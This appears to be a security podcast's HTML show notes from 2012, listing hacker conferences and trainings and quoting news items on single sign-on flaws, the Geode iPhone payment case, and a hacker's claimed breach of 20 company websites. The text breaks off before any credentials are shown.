<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012<br class="kix-line-break" /><br />
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV<br class="kix-line-break" /><br />
	</span><a href="http://defcon.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2F&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2F&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div>ea25e3ef-5027-40e4-a56f-ad6cfcd06cb3[/amazon-carrousel</span><a href="http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">]</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span></a><a href="http://www.darkreading.com/authentication/167901072/security/news/232602844/web-services-single-sign-on-contain-big-flaws.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/authentication/167901072/security/news/232602844/web-services-single-sign-on-contain-big-flaws.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As more and more organizations tap into single sign-on (SSO) schemes through Web services providers such as Google and Facebook, new research suggests that they must better plan how they implement SSO APIs lest they leave users open to attack. New findings by Microsoft Research found troubling logic flaws in SSO for Facebook, Google ID, PayPal, and other Web services that threaten a large number of users online.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Though each flaw had its own unique characteristics, all eight detailed in the</span><a href="http://research.microsoft.com/pubs/160659/websso-final.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">report</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> had one trait in common.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;All these flaws allow the attacker to sign in as the victim to her accounts on the websites using SSO services even without knowing the victim&rsquo;s password,&quot; says Dr. XiaoFeng Wang, associate professor of computer science at Indiana University at Bloomington and co-author of the report with Rui Wang and Shuo Chen. &nbsp;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.cultofmac.com/154808/geode-turns-iphone-into-universal-credit-card-rewriter/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cultofmac.com/154808/geode-turns-iphone-into-universal-credit-card-rewriter/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I never thought I&rsquo;d get excited about boring credit cards, but Geode is an incredibly neat little kit which turns your iPhone into a payment system that can be used anywhere. And not some fancy NFC-style POS terminals, either. The Geode works anywhere you can use a regular credit card.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The kit contains three main parts, plus an app. First is the case, into which your iPhone slips. The second is a detachable card reader, and the third is a reprogrammable credit card which lives in the back of the iPhone case.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To use it, you scan your cards into your phone by swiping them through the reader, and then toss the reader into a drawer or whatever. Then, when you want to use a card, select it in the app and its details are written to the card. Use the card just like any other credit card, even in chip-and-PIN machines.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As if that wasn&rsquo;t clever enough, you can also scan the barcodes of your store loyalty cards and they are displayed on an e-ink screen on the back of the case, readable by any in-store scanner.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Finally, the app is protected by a fingerprint reader on the front of the case, so that if you lose your phone, the finder won&rsquo;t get access to all your cards.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.zdnet.com/blog/security/apple-cbs-fox-sony-warner-bros-and-15-others-hacked/10952"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/security/apple-cbs-fox-sony-warner-bros-and-15-others-hacked/10952</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hacker</span><a href="https://twitter.com/#%21/UR0B0R0X"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">UR0B0R0X</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> claims to have compromised the websites of 20 different companies, including ZDNet&rsquo;s parent company,</span><a href="http://www.cbs.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">CBS</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. While the identities (first name, last name, and e-mail address) of the employees working for said companies appear to be legitimate, their passwords are hashed, so there&rsquo;s no way to verify if the logins are indeed legitimate. If they are, it&rsquo;s possible the hacker stole whatever data the employees in question have access to.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here are the 20 company websites UR0B0R0X claims to have hacked:</span><a href="http://addisoninteractive.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Addison Interactive</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://ai.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Artificial Intelligence</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://mac.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Apple</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://brandonyano.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Brandon Yano</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://bunim-murray.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Bunim/Murray Productions</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://cbs.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">CBS</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://emixing.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Emixing</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://www.fox.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Fox</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://noodle-haus.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">NoodleHaus</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://planetarygroup.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Planetary Group</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://rpm-productions.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">RPM Productions</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://scarletterrier.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Scarlet Terrier</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://www.sony.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Sony</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://www.sonypictures.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Sony Pictures</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://www.subway.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Subway</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://summit-ent.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Summit Entertainment</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://sycamoresol.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Sycamore Solutions</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://madebyunion.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Union</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, and</span><a href="http://www.warnerbros.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Warner Bros.</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, and</span><a href="http://vibecreativela.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Vibe Creative</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here are the credentials belonging to the 20 companies from</span><a href="http://pastebin.com/sQVBqi1Q"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Pastebin</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
